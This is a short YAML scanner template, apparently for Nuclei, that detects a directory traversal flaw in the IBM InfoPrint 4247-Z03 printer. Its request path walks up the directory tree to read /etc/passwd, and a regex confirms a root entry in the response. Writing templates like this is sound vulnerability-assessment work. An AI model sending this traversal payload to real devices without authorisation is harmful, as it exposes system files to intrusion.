id: ibm-infoprint-lfi

info:
  name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
  author: Harsh Bothra
  severity: medium
  description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.

  # reference: https://www.exploit-db.com/exploits/47835

requests:
  - method: GET
    path:
      - '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0"
        part: body
